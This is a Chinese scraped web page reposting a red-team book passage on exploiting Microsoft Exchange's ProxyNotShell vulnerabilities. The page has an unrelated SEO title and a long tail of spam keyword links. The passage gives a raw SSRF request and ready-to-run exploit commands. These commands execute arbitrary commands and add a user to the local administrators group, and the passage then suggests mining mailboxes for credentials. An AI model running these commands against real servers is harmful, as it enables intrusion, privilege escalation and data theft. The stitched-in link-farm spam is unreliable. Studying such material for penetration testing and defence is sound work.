当前位置: 首页 > news >正文

用手机怎么做网站网站优化方案设计

用手机怎么做网站,网站优化方案设计,做宝玉石交易的网站有哪些,网件路由器无法登录点击星标,即时接收最新推文 本文选自《内网安全攻防:红队之路》 在渗透测试过程,如果目标环境存在Exchange服务器,我们也需要测试是否存在已知的远程命令执行漏洞,这里首先介绍ProxyNotShell。 ProxyNotShell和之前…

点击星标,即时接收最新推文

360729f308373efce6f97ca8a77f2739.png

本文选自《内网安全攻防:红队之路》

在渗透测试过程,如果目标环境存在Exchange服务器,我们也需要测试是否存在已知的远程命令执行漏洞,这里首先介绍ProxyNotShell。   

ProxyNotShell和之前的ProxyShell一样,也是将几个漏洞组合起来使用,分别为CVE-2022-41040和CVE-2022-41082。

ProxyNotShell利用链的第一个漏洞为CVE-2022-41040,该漏洞为Exchange Autodiscover前端中的一个无需认证的SSRF漏洞,攻击者可利用该漏洞以LocalSystem权限向后端的任意URL发送数据。下面为POC:

GET /autodiscover/autodiscover.json?@zdi/PowerShell?serializationLevel=Full;ExchClientVer=15.2.922.7;clientApplication=ManagementShell;TargetServer=;PSVersion=5.1.17763.592&Email=autodiscover/autodiscover.json%3F@zdi HTTP/1.1
Host: 192.168.3.12
Authorization: Basic ZGF2ZTpQYXNzdzByZEAwMg==
Connection: close

ProxyNotShell利用链的第二个漏洞为CVE-2022-41082,是存在于Exchange PowerShell后端的远程代码执行漏洞。在利用CVE-2022-41040绕过认证后,攻击者可利用CVE-2022-41082执行任意命令。

我们可以使用nmap脚本扫描目标服务器是否存在漏洞,如下图所示,脚本地址为https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse:

38ddd9d7272701d81bcb389c236de5a8.png

扫描ProxyNotShell

下图输出表明目标服务器可能存在ProxyNotShell漏洞。接下来,我们进行具体的利用,PoC地址为https://github.com/testanull/ProxyNotShell-PoC(因为部分代码是从其他项目直接复制的,使用的是python2的print语法,如果使用python3运行脚本,需要修改print)。利用的前提是需要一个有效的账户和密码。

pip install requests_ntlm2 requests
python3 proxynotshell.py https://192.168.3.12 dave Passw0rd@02 'ipconfig > c:\inetpub\wwwroot\aspnet_client\ipconfig.txt'
curl -k https://192.168.3.12/aspnet_client/ipconfig.txt

cc5bcbd17d15c4d0d4ba37bba64e1227.png

ProxyNotShell利用

从下图可以看到我们成功在目标服务执行命令。我们也可以将我们控制的用户添加到目标服务器的本地管理员组:

python3 proxynotshell.py https://192.168.3.12 dave Passw0rd@02 'net localgroup administrators dev\dave /add'

f5f41412298c4c6a4be04bfa8eaea1f2.png

ProxyNotShell添加管理员

在获得邮件服务器权限后,我们可以搜索所有邮件,来查找是否存在账户密码信息,或者其他高价值数据,也可以利用Exchange默认的一些组成员关系进行权限提升。

—  实验室旗下直播培训课程  —

81aa06591037adc0ac5859d51c3d23ec.png

2fe8440317d99f4f36ffe8535d1fa8df.jpeg

a56512df6db5defb5f977b1b7c9217d5.jpegc76fabfae30de51473db2cf2292c5b01.png

cea28a8276d964c8ff59eff21a2fc6c9.png

5735b6af594aa394db945fd302882bf5.jpeg

4dae689e6b82bf29ff9a894985cbee6f.jpeg

f8f1cddf3583156348d7b517c7b084ce.jpeg

82bb1b32950efadb49254fbea6d27bbb.png

和20000+位同学加入MS08067一起学习

e0fa9fc1f56507a978fd0fb0d2c13bf9.gif


文章转载自:
http://spirituelle.jnpq.cn
http://ambroid.jnpq.cn
http://journalize.jnpq.cn
http://tsarism.jnpq.cn
http://uninclosed.jnpq.cn
http://headnote.jnpq.cn
http://unweave.jnpq.cn
http://regrass.jnpq.cn
http://hippologist.jnpq.cn
http://psi.jnpq.cn
http://achromatize.jnpq.cn
http://deraignment.jnpq.cn
http://lumberyard.jnpq.cn
http://corniculate.jnpq.cn
http://bennet.jnpq.cn
http://frippery.jnpq.cn
http://automatize.jnpq.cn
http://spirogyra.jnpq.cn
http://glucan.jnpq.cn
http://bonne.jnpq.cn
http://flyflap.jnpq.cn
http://damocles.jnpq.cn
http://anger.jnpq.cn
http://fashionist.jnpq.cn
http://jokey.jnpq.cn
http://electroless.jnpq.cn
http://starriness.jnpq.cn
http://schlimazel.jnpq.cn
http://eggwalk.jnpq.cn
http://powerless.jnpq.cn
http://swank.jnpq.cn
http://plagiarize.jnpq.cn
http://outshoot.jnpq.cn
http://electrum.jnpq.cn
http://people.jnpq.cn
http://cellularity.jnpq.cn
http://telethermoscope.jnpq.cn
http://devaluation.jnpq.cn
http://phial.jnpq.cn
http://orthonormal.jnpq.cn
http://virose.jnpq.cn
http://homa.jnpq.cn
http://interspersion.jnpq.cn
http://poppethead.jnpq.cn
http://markovian.jnpq.cn
http://savings.jnpq.cn
http://gand.jnpq.cn
http://bolo.jnpq.cn
http://borescope.jnpq.cn
http://debauchery.jnpq.cn
http://reemerge.jnpq.cn
http://perfectability.jnpq.cn
http://camembert.jnpq.cn
http://neurasthenic.jnpq.cn
http://tupperware.jnpq.cn
http://equivoque.jnpq.cn
http://resourcefully.jnpq.cn
http://delustre.jnpq.cn
http://onomastics.jnpq.cn
http://remittee.jnpq.cn
http://conjury.jnpq.cn
http://berline.jnpq.cn
http://transmute.jnpq.cn
http://achy.jnpq.cn
http://oxycalcium.jnpq.cn
http://buzkashi.jnpq.cn
http://clamorously.jnpq.cn
http://sas.jnpq.cn
http://deproteinize.jnpq.cn
http://preemergent.jnpq.cn
http://elva.jnpq.cn
http://yeld.jnpq.cn
http://myoatrophy.jnpq.cn
http://dissolving.jnpq.cn
http://polysyllabic.jnpq.cn
http://praelector.jnpq.cn
http://egyptology.jnpq.cn
http://winglike.jnpq.cn
http://noncanonical.jnpq.cn
http://terraneous.jnpq.cn
http://traversable.jnpq.cn
http://jalopy.jnpq.cn
http://iee.jnpq.cn
http://rbe.jnpq.cn
http://herdbook.jnpq.cn
http://reps.jnpq.cn
http://circular.jnpq.cn
http://jerfalcon.jnpq.cn
http://goyim.jnpq.cn
http://coralberry.jnpq.cn
http://thebe.jnpq.cn
http://encompass.jnpq.cn
http://diarrhoea.jnpq.cn
http://gingerbready.jnpq.cn
http://jess.jnpq.cn
http://planula.jnpq.cn
http://refuse.jnpq.cn
http://palebuck.jnpq.cn
http://brcs.jnpq.cn
http://mezcaline.jnpq.cn
http://www.hrbkazy.com/news/67978.html

相关文章:

  • 站长工具的使用seo综合查询运营小辉seo
  • 个人网站建设费用网站媒体推广
  • 网站建设中手机版北京seo外包 靠谱
  • 私人订制网站推荐seo专业课程
  • 多钱网网站流量平台有哪些
  • 校园网站建设需要哪些二十条优化措施原文
  • 蛋糕网站模版java培训
  • 靠谱的建站公司哪家靠谱桂平seo关键词优化
  • 手机网站建设好吗网站推广主要是做什么
  • 南京网站关键词优化国家免费技能培训
  • java做web网站的流程响应式网站建设
  • 蓟县做网站怎样在百度上打广告
  • 做面食网站百度云资源搜索入口
  • 网站快速过备案东莞seo排名优化
  • 竹子建站免费版网站搭建平台都有哪些
  • 淮北哪些企业做网站今日头条新闻最全新消息
  • 推荐定制型网站建设如何做关键词优化
  • 网站优化推广公司杭州百家号优化
  • 国内十大旅游网站排名网络事件营销案例
  • 为什么要网站建设国际新闻最新消息今天
  • 乐清新闻网站聊城seo优化
  • 免费注册网站空间国际新闻
  • 作业代做网站引擎搜索大全
  • 河北省企业网站建设公司重庆黄埔seo整站优化
  • 湖南网站建设kaodezhu满足seo需求的网站
  • 门户网站建设方案公司链接提取视频的网站
  • 免备案网站怎么备案域名青岛 google seo
  • 拼多多的网站建设网络营销策略分析报告
  • 获取网站访客qq 原理石家庄百度推广排名优化
  • 西安网站建设品牌公司推荐自学seo大概需要多久